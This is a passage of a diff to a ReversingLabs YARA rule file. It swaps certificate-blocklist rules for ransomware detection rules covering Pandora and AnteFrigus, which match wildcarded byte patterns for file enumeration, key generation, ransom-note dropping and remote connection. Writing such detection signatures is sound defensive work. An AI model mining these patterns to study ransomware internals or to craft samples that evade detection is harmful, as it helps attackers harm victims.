+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 58 E8 ?? ?? ?? ?? 75 ?? C6 45 ?? ??
+            46 4B 0F 85 ?? ?? ?? ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 A1 ?? ?? ??
+            ?? 50 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 15 ?? ?? ??
+            ?? 83 C0 ?? 83 D2 ?? 89 05 ?? ?? ?? ?? 89 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 80 ?? ??
+            ?? ?? 8B 10 FF 92 ?? ?? ?? ?? 84 C0 75 ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 80 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Futumarket LLC" and pe.signatures [ i ] . serial == "03:00:12:f1:34:e6:43:47:66:9f:32:56:c7:d0:50:c5" and 1604036657 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( all of ( $enum_and_encrypt_files_* ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Fa3Dcac19B884B44Ef4F81541184D6B0 : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Pandora : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Pandora ransomware."
 		author = "ReversingLabs"
-		id = "574ee0d4-ba7c-5c74-b711-222f92196f4a"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "18182bbe-1678-5d0b-a7ee-80c4bbaee99e"
+		date = "2022-06-01"
+		modified = "2022-06-01"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6808-L6826"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "324de84cb8c2f5402c9326749e3456e11312828df2523954fd84f7fb3298fdf3"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win64.Ransomware.Pandora.yara#L1-L95"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6576bde36ae9a9bc2e9dd878db788c608083b84d96d31e6898f48a264c6b7f1a"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Pandora"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            41 57 41 56 41 55 41 54 56 57 55 53 48 83 EC ?? 48 89 4C 24 ?? C7 44 24 ?? ?? ?? ??
+            ?? 45 31 F6 41 BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ??
+            ?? 48 89 4C 24 ?? 45 31 C0 41 81 FA ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 0F
+            4C CA 41 0F 94 C0 48 8B 8C 08 ?? ?? ?? ?? 48 01 F1 31 D2 31 DB 41 81 FA ?? ?? ?? ??
+            0F 9C C2 0F 95 C3 41 BD ?? ?? ?? ?? 49 29 D5 41 81 FA ?? ?? ?? ?? BF ?? ?? ?? ?? BA
+            ?? ?? ?? ?? 48 0F 4C FA 4C 8D 4C 9B ?? 41 BB ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 0F 44 DA
+            49 83 C8 ?? 31 DB 31 D2 41 81 FA ?? ?? ?? ?? 0F 9C C3 4C 8D 64 1B ?? 0F 94 C2 48 83
+            F2 ?? 31 DB 41 81 FA ?? ?? ?? ?? 0F 94 C3 48 8D 1C DB 48 83 C3 ?? EB ?? 0F 1F 40 ??
+            4A 8B AC C0 ?? ?? ?? ?? 48 01 F5 FF E5 FF E1 4A 8B AC E0 ?? ?? ?? ?? 48 01 F5 FF E5
+            48 8B AC D8 ?? ?? ?? ?? 48 01 F5 FF E5 0F 1F 80 ?? ?? ?? ?? 48 8B AC F8 ?? ?? ?? ??
+            48 01 F5 FF E5 4A 8B AC E8 ?? ?? ?? ?? 48 01 F5 FF E5 4A 8B AC D8 ?? ?? ?? ?? 48 01
+        }
+		$find_files_p2 = {
+            F5 FF E5 66 0F 1F 84 00 ?? ?? 00 00 48 8B AC D0 ?? ?? ?? ?? 48 01 F5 FF E5 4A 8B AC
+            C8 ?? ?? ?? ?? 48 01 F5 FF E5 44 89 74 24 ?? 48 63 4C 24 ?? 48 8B 54 24 ?? 48 8B 8C
+            CA ?? ?? ?? ?? 48 89 4C 24 ?? 48 8B 4C 24 ?? 8B 54 24 ?? BD ?? ?? ?? ?? 01 EA 44 8B
+            54 24 ?? BD ?? ?? ?? ?? 41 01 EA 66 83 39 ?? 44 0F 45 D2 E9 ?? ?? ?? ?? 45 31 FF EB
+            ?? 66 2E 0F 1F 84 00 ?? ?? 00 00 90 41 BF ?? ?? ?? ?? 44 8B 54 24 ?? 41 81 C2 ?? ??
+            ?? ?? E9 ?? ?? ?? ?? 66 0F 1F 84 00 ?? ?? 00 00 44 8B 74 24 ?? 41 83 C6 ?? 48 8B 54
+            24 ?? 48 8B 05 ?? ?? ?? ?? 48 8B 80 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 01 C8 48 8B 4C 24
+            ?? FF D0 8B 4C 24 ?? BA ?? ?? ?? ?? 01 D1 44 8B 54 24 ?? BA ?? ?? ?? ?? 41 01 D2 85
+            C0 44 0F 44 D1 E9 ?? ?? ?? ?? 44 89 F8 48 83 C4 ?? 5B 5D 5F 5E 41 5C 41 5D 41 5E 41
+            5F C3
+        }
+		$generate_key = {
+            41 57 41 56 41 55 41 54 56 57 55 53 48 81 EC ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48
+            8D B4 24 ?? ?? ?? ?? 48 89 74 24 ?? 48 8B 44 24 ?? 48 8B 05 ?? ?? ?? ?? 48 C7 C5 ??
+            ?? ?? ?? 48 8B 80 ?? ?? ?? ?? 48 01 E8 41 BC ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 4C 01
+            E1 BA ?? ?? ?? ?? 48 03 15 ?? ?? ?? ?? FF D0 48 8B 05 ?? ?? ?? ?? 48 8B 4C 24 ?? 0F
+            B7 90 ?? ?? ?? ?? 66 89 51 ?? 48 8B 80 ?? ?? ?? ?? 48 89 01 48 8B 05 ?? ?? ?? ?? 48
+            8B 80 ?? ?? ?? ?? 48 01 E8 48 8B 0D ?? ?? ?? ?? 4C 01 E1 FF D0 48 8B 05 ?? ?? ?? ??
+            48 8B 80 ?? ?? ?? ?? 48 01 E8 48 8B 0D ?? ?? ?? ?? 4C 01 E1 FF D0 48 8B 05 ?? ?? ??
+            ?? 48 8B 80 ?? ?? ?? ?? 48 01 E8 48 89 F1 FF D0 48 98 4C 8B 05 ?? ?? ?? ?? 4D 01 E0
+            48 8B 0D ?? ?? ?? ?? 48 8B 99 ?? ?? ?? ?? 48 01 EB 48 8B 0D ?? ?? ?? ?? 4C 01 E1 48
+            89 44 24 ?? 48 8D 15 ?? ?? ?? ?? 49 89 F1 FF D3 89 84 24 ?? ?? ?? ?? B9 ?? ?? ?? ??
+            45 31 ED 41 BE ?? ?? ?? ?? 41 BF ?? ?? ?? ?? BB ?? ?? ?? ?? EB ?? 81 F9 ?? ?? ?? ??
+            BA ?? ?? ?? ?? BF ?? ?? ?? ?? 48 0F 44 D7 48 8B 04 10 4C 01 F0 FF E0
+        }
+		$drop_ransom_note = {
+            48 8B 05 ?? ?? ?? ?? 48 8B 80 ?? ?? ?? ?? BD ?? ?? ?? ?? 48 01 E8 48 8B 0D ?? ?? ??
+            ?? BE ?? ?? ?? ?? 48 01 F1 48 8B 15 ?? ?? ?? ?? BF ?? ?? ?? ?? 48 01 FA FF D0 48 8B
+            0D ?? ?? ?? ?? 48 01 F1 48 8B 05 ?? ?? ?? ?? 48 8B 90 ?? ?? ?? ?? 48 01 EA FF D2 48
+            8B 15 ?? ?? ?? ?? 48 01 F2 48 8B 8C 24 ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 48 8B B6 ??
+            ?? ?? ?? 48 01 EE 48 C7 44 24 ?? ?? ?? ?? ?? 41 89 C0 4C 8D 4C 24 ?? FF D6 BE ?? ??
+            ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B 90 ?? ?? ?? ?? 41 BE ?? ??
+            ?? ?? 48 01 EA FF D2 BF ?? ?? ?? ?? 8B 4C 24 ?? B8 ?? ?? ?? ?? 01 C1 E9 ?? ?? ?? ??
+            81 F9 ?? ?? ?? ?? BA ?? ?? ?? ?? BD ?? ?? ?? ?? 48 0F 44 D5 48 8B 04 10 4C 01 E0 FF
+            E0 8B 44 24 ?? 83 C0 ?? 89 44 24 ?? 8B 4C 24 ?? B8 ?? ?? ?? ?? 01 C1 E9 ?? ?? ?? ??
+            81 F9 ?? ?? ?? ?? BA ?? ?? ?? ?? BD ?? ?? ?? ?? 48 0F 44 D5 48 8B 04 10 4C 01 E0 FF
+            E0 8B 4C 24 ?? B8 ?? ?? ?? ?? 01 C1 E9 ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? BA ?? ?? ?? ??
+            BD ?? ?? ?? ?? 48 0F 44 D5 48 8B 04 10 4C 01 E0 FF E0 8B 4C 24 ?? B8 ?? ?? ?? ?? 01
+            C1 C7 44 24 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? BA ?? ?? ?? ?? BD ?? ??
+            ?? ?? 48 0F 44 D5 48 8B 04 10 4C 01 E0 FF E0 48 8B 05 ?? ?? ?? ?? 48 8B 88 ?? ?? ??
+            ?? 48 8B 05 ?? ?? ?? ?? 48 8B 80 ?? ?? ?? ?? 4C 01 F0 C7 44 24 ?? ?? ?? ?? ?? 48 8D
+            54 24 ?? 4C 8D 84 24 ?? ?? ?? ?? 4C 8D 4C 24 ?? FF D0 BF ?? ?? ?? ?? 8B 54 24 ?? B9
+            ?? ?? ?? ?? 01 CA 8B 4C 24 ?? BD ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ??
+            48 8B 84 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 31 C0 48 81
+            C4 ?? ?? ?? ?? 5B 5D 5F 5E 41 5C 41 5D 41 5E 41 5F C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Unicom Ltd" and ( pe.signatures [ i ] . serial == "00:fa:3d:ca:c1:9b:88:4b:44:ef:4f:81:54:11:84:d6:b0" or pe.signatures [ i ] . serial == "fa:3d:ca:c1:9b:88:4b:44:ef:4f:81:54:11:84:d6:b0" ) and 1603958571 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $generate_key ) and ( $drop_ransom_note )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0E6F4Cb8B06E01C3Bd296Ace3A95F814 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Antefrigus : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects AnteFrigus ransomware."
 		author = "ReversingLabs"
-		id = "7a829a63-eeb4-50ef-829d-fc13572c1148"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "903ac92c-1a4a-5645-92db-d00b3bfd6ada"
+		date = "2021-03-05"
+		modified = "2021-03-05"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6828-L6844"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f3184a9d1fe2a1cf2dcc04d26c284aa9a651d2f00aa28642d7f951550a050138"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.AnteFrigus.yara#L1-L210"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b84c01da0ee97a4eb8bf099c71094f994feb4c7185ad75b8b2ccda5eee283a92"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "AnteFrigus"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 68 ?? ?? ?? ?? 8B D0
+            89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 83 65 ?? ?? 8D 8D ?? ?? ?? ?? 83 7D ?? ?? 8D 45
+            ?? 51 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 33 C0 8D 7D
+            ?? AB AB AB 33 C0 89 45 ?? 89 45 ?? 89 45 ?? C6 45 ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ??
+            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            68 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 59 8B D0 C6 45 ?? ?? 8B 4A ?? 8B 7A ?? 2B
+            CF 39 4E ?? 76 ?? 8B 46 ?? 2B 46 ?? 3B C7 72 ?? 83 7A ?? ?? 72 ?? 8B 12 57 52 51 8B
+            CE E8 ?? ?? ?? ?? EB ?? 56 8B CA E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 85 ??
+            ?? ?? ?? ?? 8D 45 ?? FF B5 ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            83 7D ?? ?? 8D 4D ?? 8B 45 ?? 0F 43 4D ?? 8D 04 41 8D 4D ?? 0F 43 4D ?? 51 50 51 8D
+            4D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 83 65 ?? ?? 8D 4D ?? 83 65 ?? ?? 50 E8 ??
+            ?? ?? ?? C6 45 ?? ?? 8D 75 ?? 83 7D ?? ?? 8B 55 ?? 0F 43 75 ?? 85 D2 74 ?? 83 C9 ??
+            8D 42 ?? 3B C1 0F 42 C8 03 CE EB ?? 3B CE 74 ?? 49 80 39 ?? 75 ?? 2B CE EB ?? 83 C9
+            ?? 83 F9 ?? 0F 84 ?? ?? ?? ?? 83 65 ?? ?? 8D 71 ?? C7 45 ?? ?? ?? ?? ?? C6 45
+        }
+		$find_files_p2 = {
+            3B D6 0F 82 ?? ?? ?? ?? 2B D6 8D 45 ?? 83 C9 ?? 83 FA ?? 0F 42 CA 83 7D ?? ?? 51 0F
+            43 45 ?? 8D 4D ?? 03 C6 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 8D 45 ?? 50 83
+            61 ?? ?? 83 61 ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 51 51 8D 45 ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ??
+            6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? BF ?? ?? ?? ?? 8B 70 ?? 03 30 3B F7 7D ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 3B F7 7D ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
+            ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 8B 45 ?? 8D 4D ?? 51 3B 45 ?? 74 ?? 8B C8 E8 ?? ??
+            ?? ?? 83 45 ?? ?? EB ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ??
+            C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ??
+            ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 7D ?? 8B 75 ?? 6A ?? 5B 3B F7 74 ?? 56 E8 ?? ?? ??
+            ?? 03 F3 59 3B F7 75 ?? 8B 7D ?? 8B 75 ?? 85 F6 74 ?? 3B F7 74 ?? 8B CE E8 ?? ?? ??
+            ?? 03 F3 3B F7 75 ?? 8B 75 ?? 8B 45 ?? 2B C6 99 F7 FB 6B C0 ?? 50 56 E8 ?? ?? ?? ??
+            59 59 8D 4D ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E8
+        }
+		$remote_connection_p1 = {
+            55 8D AC 24 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50
+            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 85 ?? ?? ?? ?? 53 56 57 50 8D 45 ?? 64 A3
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 BA ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ??
+            ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 0F 43
+            8D ?? ?? ?? ?? 03 F9 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? 0F 43 B5 ?? ?? ?? ?? 33 C0 66 89 85 ?? ?? ?? ?? 33 DB 8B C7 89 9D
+        }
+		$remote_connection_p2 = {
+            2B C6 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? C6 45 ?? ?? EB ?? 66 0F BE 06 8D
+            8D ?? ?? ?? ?? 0F B7 C0 50 E8 ?? ?? ?? ?? 46 3B F7 75 ?? 53 53 53 53 68 ?? ?? ?? ??
+            C6 45 ?? ?? 88 5D ?? FF 15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 6A ?? 33 C0 50
+            6A ?? 50 50 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 89 45 ?? 85
+            C0 74 ?? 6A ?? 68 ?? ?? ?? ?? 33 C9 51 51 51 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 8B F0 85 F6 74 ?? 33 C0 50 50 50 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68
+            ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ??
+            83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 56 FF D7 FF 75 ?? FF D7 53 FF
+            D7 80 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 8D ?? ?? ?? ?? 33 CD E8 ?? ?? ?? ?? 81
+            C5 ?? ?? ?? ?? C9 C3 8B 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 73 ??
+            8D 95 ?? ?? ?? ?? C6 84 05 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85
+            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ??
+            E9 ?? ?? ?? ?? E8
+        }
+		$encrypt_files_p1 = {
+            66 39 03 0F 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 33 C0 8D 8D ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ??
+            ?? 8D 95 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 0F 43 95
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 5B C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 39 9D ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 8D 04 41 8D 8D ?? ?? ?? ?? 0F 43 8D ?? ?? ??
+            ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89
+            85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 BA ?? ?? ?? ?? 8D
+            4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ??
+            83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ??
+            ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D
+        }
+		$encrypt_files_p2 = {
+            8D ?? ?? ?? ?? 83 C4 ?? 3B C8 74 ?? 33 C9 88 4D ?? 8D 8D ?? ?? ?? ?? FF 75 ?? 50 E8
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ??
+            ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 56 E8
+            ?? ?? ?? ?? 56 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 33 C0 59 89 85 ??
+            ?? ?? ?? 89 8D ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 88
+            85 ?? ?? ?? ?? BF ?? ?? ?? ?? C6 45 ?? ?? 57 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 8D 4D
+            ?? E8 ?? ?? ?? ?? 33 C0 C6 45 ?? ?? 57 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 59 99 F7 F9 8D 4D ??
+            52 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 59 99 F7 F9 8D 8D ?? ?? ?? ?? 52 E8 ?? ?? ??
+            ?? 83 EB ?? 75 ?? 8D 95 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 57 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 51 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ??
+            ?? ?? ?? 39 9D ?? ?? ?? ?? 74 ?? 83 BD ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? FF B5 ?? ??
+            ?? ?? 0F 43 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 56 8D 4D ?? E8 ?? ?? ?? ?? 59 8D 8D ??
+            ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 56 8D 45 ??
+            C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51
+        }
+		$encrypt_files_p3 = {
+            8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 56 8D 45 ?? C6 45 ?? ?? 50 8D 85 ??
